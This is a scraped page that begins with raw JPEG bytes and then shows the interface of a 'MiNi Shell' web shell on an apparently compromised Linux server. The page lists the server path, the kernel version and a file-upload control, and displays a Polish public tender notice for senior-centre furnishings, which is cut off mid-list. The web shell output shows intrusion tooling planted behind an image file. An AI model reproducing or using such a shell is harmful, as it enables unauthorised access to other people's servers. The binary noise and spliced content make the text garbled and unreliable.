JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191029/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191029/615998-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 615998-N-2019 z dnia 2019-10-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Ośrodek Pomocy Społecznej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zakup i dostawa wyposażenia do Dziennego Domu Senior +</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Ośrodek Pomocy Społecznej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">34519730000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Górnych Wałów</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">9</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">44-100</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Gliwice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">323 359 700</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ops@ops.gliwice.eu</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">322 308 027</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://opsgliwice.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://ops.bip.gliwice.eu/ogloszenia/zamowienia_publiczne</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zakup i dostawa wyposażenia do Dziennego Domu Senior +</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.321.23.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Część 1 - Meble Zestaw mebli kuchennych – każda szafka dolna i wisząca w tym samym kolorze oraz wykończeniem. Meble będą tworzyć zestaw.I.	Szafki dolne 1.	szafka stojąca:•	wymiary: sz./ wys./gł. 60/81/46-55 cm •	z szufladą w górnej części, dwudrzwiowa otwierana na boki, półka demontowana w środku.•	Ilość sztuk – 1 •	szafka stojąca pod zlewozmywak wraz ze zlewozmywakiem dwukomorowym nakładanym. •	wymiary: sz./ wys./gł. 68/81/46-55 cm,•	dwoje drzwiczek •	Typ zlewozmywaka nakładany•	Wymiary (szer. x głęb.) 800 x 500 mm•	Kolor srebrny•	Wykonanie stal szlachetna •	Otwór na baterię tak•	Ilość sztuk – 1 II.	Szafki górne1.	szafka wisząca z przeszkleniem•	wymiary: szerokość 60 cm, głęb. 31 cm, wysokość 57-60•	dwoje drzwiczek , 2 półki demontowane w środku. •	Ilość sztuk – 1 2.	szafka wisząca okapowa•	wymiary: szerokość 60 cm, głęb. 31 cm, wysokość 57-60•	jednodrzwiowa, otwierana do góry, zawiasy z siłownikami utrzymującymi drzwiczki podczas otwierania. •	Ilość sztuk – 1 3.	szafka wisząca z suszarką na naczynia mokre•	Wymiary: szerokość 80 cm, głęb. 31 cm, wysokość 57-60•	dwudrzwiowa, •	Ilość sztuk – 1 Kolor i wykończenie wszystkich szafki : Kolor brązowy lub dąb, wykonanie frontu łatwo zmywalne, odporne na wodę, uchwyty szafek górnych i dolnych łatwe w utrzymaniu czystości, bez ostrych zakończeń. III.	blat kuchenny•	materiał wykonania: płyta wiórowa laminowana, kolor zbliżony do koloru szafek•	wymiary :gr: 38mm, szer.: 60 cm, długość: 305 cm•	Ilość sztuk – 1 IV.	stół konferencyjny •	blat wykonany z płyty laminowanej, kolor klon, z metalowym stelażem i okrągłymi nogami, •	Wymiary: 139 x 75 x 76 cm•	Ilość sztuk – 4V.	krzesło tapicerowane •	stelaż krzesła wykonany z rury okrągłej o średnicy 25 mm, siedzisko i oparcie tapicerowane, wymiary: szerokość siedziska 38 cm (kolory szarości)•	Ilość sztuk – 30VI.	szafa ubraniowa schowkowa •	o wymiarach 90 x 55 x 187,5 cm, szafa wykonana z płyty laminowanej w tonacji klonu, o gr. płyty 18 mm, drzwi wykonane z płyty z trwałą okleiną termoplastyczną, kolor drzwi frontowych w tonacji szaro-białej, szafy/schowki wyposażone w plastikowe uchwyty (gałki) w kolorze aluminium. Szafy wyposażone w metalowe nóżki, z podziałem na cztery schowki, każdy schowek posiada wieszak na ubrania, oraz wyposażone w zamki z kluczem w każdym schowku. Łącznie 32 schowki zamykane na klucz w 8 zamawianych szafach.•	Ilość sztuk – 8VII.	sofa 3- osobowa •	metalowe okrągłe nóżki umożliwiają poziomowanie mebla, siedziska i oparcia pokryte wytrzymałą tkaniną, o bardzo dużej odporności na plamy i zabrudzenia, •	wymiary: wys. siedziska 41 cm , gł. siedziska 52 cm, wym. 145 x 70 x 80 cm, •	kolor granatowy•	Ilość sztuk – 1VIII.	niski stół kawowy •	metalowa konstrukcja w kolorze aluminium, nogi wyposażone w stopkę umożliwiającą regulację wysokości. Blat stołu wykonany z płyty laminowanej o gr. 25 mm wykończonej obrzeżem o gr. 2 mm. •	Wymiary: śr. 80 cm, wys. 50 cm•	Ilość sztuk – 1IX.	biurko z szafką i szufladą •	wykonane z białej płyty laminowanej o gr. 18 mm, wykończone obrzeżem o gr. 2 mm. Wyposażone w szafkę i 1 szufladę zamykaną na zamek, •	wymiary: 120 x 60 x 76 cm•	Ilość sztuk – 1X.	krzesło obrotowe •	wykonane z tworzywa łatwo zmywalnego, kolor niebieski, siedzisko i oparcie połączone w jedną całość, odporne na zabrudzenia i wilgoć, stelaż krzesła wyposażony w kółka i mechanizm regulacji wysokości, •	wymiary: wys. siedziska od 43 do 56 cm•	Ilość sztuk – 1XI.	krzesło obrotowe biurowe •	wyposażone w wysokie, ergonomicznie wyprofilowane oparcie, regulowana wysokość, krzesło na kółkach, materiał: 100% włókno syntetyczne, kolor szaro-czarny•	wymiary: śr. 63 cm, wym. siedziska 50 x 48 cm, wys. siedziska 51-57 cm•	Ilość sztuk – 1XII.	szafa wysoka dwudrzwiowa •	szafa wykonana z płyty laminowanej o gr. 18 mm., wyposażona w 4 półki i zamek z kluczem, wymiary: 76 x 40 x 185 cm, •	kolor klon•	Ilość sztuk – 2XIII.	biurko do pokoju terapeutycznego •	wykonane z białej płyty laminowanej o gr. 18 mm, tonacja klon z zielonymi elementami, wyposażone w szafkę i 1 szufladę zamykaną na zamek, •	wymiary: 120 x 60 x 76 cm•	Ilość sztuk – 1XIV.	krzesło •	tapicera : materiałowa , kolor zielony •	rodzaj nóg: metalowe•	kolor stelaża: srebrny•	wymiary: szer. 45cm, wys. 83,5cm, •	Ilość sztuk – 2XV.	tapczan 1-osobowy •	1 szt., pojemnik otwierany, boki i pojemnik wykonane z płyty laminowanej, tonacja buku, materac pokryty granatową mikrofazą, •	wymiary: długość: 199 x szerokość: 80 x wysokość 60cm.•	Ilość sztuk – 1Część II Wyposażenie - tekstyliaI.	firana •	skład tkaniny: 100% poliester, zapewnia dopływ światła,•	wysokość 160 cm, •	długość 25m•	kolor białyII.	obrus •	skład tkaniny: poliester, prostokątny, •	dł. 180 cm, szer.130 cm,•	kolor szary •	Ilość sztuk – 4Część III Wyposażenie - naczyniaI.	komplet obiadowy (18 elementów) •	W zestaw kompletu wchodzi : 6 talerzy płytkich (25,5cm), 6 talerzy głębokich (22,5 cm), 6 talerzy deserowych (20,5cm),•	kolor biały, •	porcelana polska, •	przystosowana do mycia w zmywarce i użytkowania w kuchence mikrofalowej•	Ilość kompletów – 5II.	komplet sztućców (24 elementy) •	w skład zestawu wchodzi : nóż - 6 szt.( z ząbkami), widelec- 6szt. (szerokie rozstawienie szpikulca) łyżka - 6 szt., łyżeczka - 6 szt., •	stal nierdzewna,•	przystosowany do mycia w zmywarce •	Ilość kompletów – 2III. kubek przezroczysty •	poj. 250 ml, •	wykonany ze szkła hartowanego, z uchem do trzymania, Kubek przeznaczony do podawania napojów zimnych oraz gorących, •	przystosowany do mycia w zmywarce•	Ilość sztuk – 30Część IV Wyposażenie pozostałeI.	suszarka sufitowa •	posiada rurki powlekane polietylenem, przeznaczona do korzystania wewnątrz, •	do zamontowania pod sufitem na wys. 10 cm, •	szer. suszarki 150 cm, •	6-cio prętowa,•	Ilość sztuk – 1II.	karnisz pojedynczy •	wykonany ze stali, kolor srebrny, •	wymiary: dł. 240 cm, średnica 16 mm, •	1 drążek, 2 wsporniki, 2 końcówki, 24 kółka z żabką, montowany do ścian•	Ilość sztuk – 6III. deska do prasowania z przyłączem elektrycznym•	blat wykonany z siatki metalowej, podstawa na żelazko, •	4 stopniowa regulacja wysokości(74-90 cm), •	Wymiary: dł. 120cm, szer. 38 cm•	Ilość sztuk – 1IV.	Bateria kuchenna •	Rodzaj stojąca•	Typ baterii jednodźwigniowa•	Wykonanie korpusu stal szlachetna•	Barwa chrom•	Wysokość korpusu min. 158 mm•	Wysokość wylewki min. 137 mm•	Zasięg wylewki min. 219 mm•	Otwór montażowy 35 mm•	Wyposażenie wężyki podłączenioweCzęść V- sprzęt do ćwiczeń indywidualnych I.	bieżnia •	komputer: ekran 5” LCD programy treningowe; Funkcje: prędkość, czas, dystans, kalorie, puls, nachylenie bieżni, tętno; Silnik o mocy 2.5 KM, prędkość: 1-18 km/h; Powierzchnia pasa bieżni: 140 x 50 cm, grubość pasa: 1,4 mm; Nachylenie bieżni: 16 poziomów, regulowane elektronicznie; System łatwego składania bieżni; Klawisze szybkiego dostępu zmiany prędkości oraz nachylenia; klucz bezpieczeństwa; Kółka transportowe; Wymiary bieżni: 185 x 87 x 139 cm, po złożeniu: 117 x 87 x 157 cm; Waga produktu: 90 kg, waga w opakowaniu: 98 kg ; Maksymalna waga użytkownika: 135 kg; •	Ilość sztuk – 1II.	rowerek poziomy  wyświetlacz negatywowy,; Poziomy oporu przystosowane dla początkujących i zaawansowanych użytkowników; Programy treningowe, Koło zamachowe: 9 kg; Typ ramy: rama pozioma; Siodełko: regulowane, z wygodnym, wyprofilowanym wysokim oparciem dla odcinka lędźwiowego; Pedały: szerokie, ergonomiczne, z regulowanymi paskami bezpieczeństwa; Pomiar pulsu: poprzez sensory umieszczone na kierownicy lub bezprzewodowo (wymagany dodatkowy pas piersiowy do pomiaru bezprzewodowego); Kółka transportowe (z przodu sprzętu); Nawiew/wentylator,(regulowany automatycznie lub ręcznie); Maksymalna waga użytkownika: 125 kg; Wymiary sprzętu: 132 x 57 x 150 cm•	Ilość sztuk – 1Część VI – sprzęt RTV i AGD I.	lodówka •	chłodziarka :217l, zamrażarka: 98l, bezszronowa, •	wymiary: wys.185cm, szer.59,5 cm, gł. 66.8cm; •	kolor: metaliczny grafit,•	położenie zamrażalki: na dole; •	funkcje dodatkowe: Wyświetlacz elektroniczny, Oświetlenie LED,; Klasa energetyczna A+++; szklane półki; •	Ilość sztuk – 1II.	telewizor •	ekran 65 cali; funkcje HDR, Smart, Wi-Fi, DLNA, USB - multimedia, USB - nagrywanie, Ambilight, HDMI x3, USB x2;Tuner DVB-T (MPEG-4), DVB-T2, DVB-T2-HD, DVB-S, DVB-S2, DVB-C, analogowy; procesor 4-rdzeniowy, USB - zdjęcia, muzyka, film, EasyLink, Digital EPG, PVR - nagrywanie USB, TimeShift, możliwość aktualizacji oprogramowania, możliwość sterowania za pomocą smartfona i tabletu, tryb ECO; możliwość montażu na ścianie; Wymiary bez podstawy: szer. x wys.x gł. - 146,2 x 85,2 x 7,1 cm •	Ilość sztuk – 1III.	wieża •	odtwarzacz płyt: CD, CD-RW, CD-R, MP3,•	moc:100 W, typ radia:FM, Cyfrowe; •	Ilość sztuk – 1IV.	czajnik bezprzewodowy •	pojemność:2.5l, moc grzałki: 2200W, element grzejny: grzałka spiralna, wykonanie: tworzywo sztuczne, obrotowa podstawa; Zabezpieczenie przed przegrzaniem, Automatyczne wyłączenie po osiągnięciu ustawionej temperatury; Czajnik posiada obrotową podstawę, dwustronny wskaźnik poziomu wody, podwójny system bezpieczeństw oraz zdejmowany i zmywalny filtr zanieczyszczeń i kamienia wodnego. Wyposażony jest również w dno grzewcze ze stali nierdzewnej ze zakrytą spiralą grzewczą i wskaźnik świetlny pracy. Ergonomiczny kształt uchwytu i wieko wyposażone w zamek bezpieczeństwa ułatwia korzystanie z urządzenia;•	Ilość sztuk – 2V.	żelazko •	stopa ceramiczna, moc:3000W, wytwarzanie pary, automatyczne wyłączenie; Funkcje dodatkowe: Auto off, Lampka kontrolna, Prasowanie na sucho i mokro, Prasowanie w pionie, Płynna regulacja temperatury; •	Ilość sztuk – 1VI.	kuchnia elektryczna •	rodzaj piekarnika i płyty grzewczej: elektryczny; rożen, termobieg, wymiary: •	wymiary: szer 60 cm; głębokość: 60cm, wysokość: 85cm; •	wnętrze piekarnika: wkłady katalityczne; wyposażenie dodatkowe: 1 półka siatkowa, widelec do rożna, 1 półka blaszana, ramka do zaczepiania rożna; •	napięcie: 230V•	Ilość sztuk – 1VII.	pralko-suszarka •	wielkość załadunku - pranie: 8kg, wielkość załadunku - suszenie: 5kg, •	wymiary: gł. 47cm, szer. 60cm, wys.85cm; •	kolor biały, blokada przedwczesnego otwarcia drzwi; •	automatyczny dobór wody do wielkości załadunku; programy: bawełna, delikatny, program szybki 30 minut, szybki 14 minut, szybki 44 minuty; •	Ilość sztuk – 1VIII.	wyparzarka do naczyń •	z pompą spustową, przeznaczona do mycia kubków, filiżanek, szkła, sztućców, talerzyków i talerzy; sterowanie manualne; dozownik nabłyszczacza; zużycie wody na 1 cykl mycia: 2,3 l; temperatura wody myjącej/płuczącej: +55°C/+85°C,•	wymiary: dł. 50 cm, szer. 50 cm,•	dostosowana do wymogów sanepidu;•	napięcie: 230V•	Ilość sztuk – 1IX.	okap kuchenny •	oświetlenie halogenowe, pochłaniacz, wyciąg,• wymiary: szer 60 